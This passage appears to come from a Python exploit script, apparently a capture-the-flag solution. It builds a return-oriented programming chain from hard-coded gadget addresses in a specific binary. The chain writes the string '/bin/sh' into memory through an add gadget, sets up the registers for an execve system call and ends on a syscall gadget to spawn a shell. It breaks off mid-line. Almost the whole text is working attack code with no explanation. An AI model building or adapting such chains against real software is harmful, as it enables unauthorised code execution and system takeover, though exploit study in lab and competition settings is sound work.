payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x452095)+p64(0x443acd)
# 0x0000000000443acd: pop rbx; ret 0; 
payload += p64(0x6e69622f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x452099)+p64(0x443acd)
# 0x0000000000443acd: pop rbx; ret 0; 
payload += p64(0x68662f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x409312)
# 0x0000000000409312: pop rdi; pop rsi; pop rdx; pop rcx; pop rax; popfq; lea rsp, [rsp + 8]; ret; 
payload += p64(0x452058)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x401008)
# 0x0000000000401008: syscall; 
payload +=
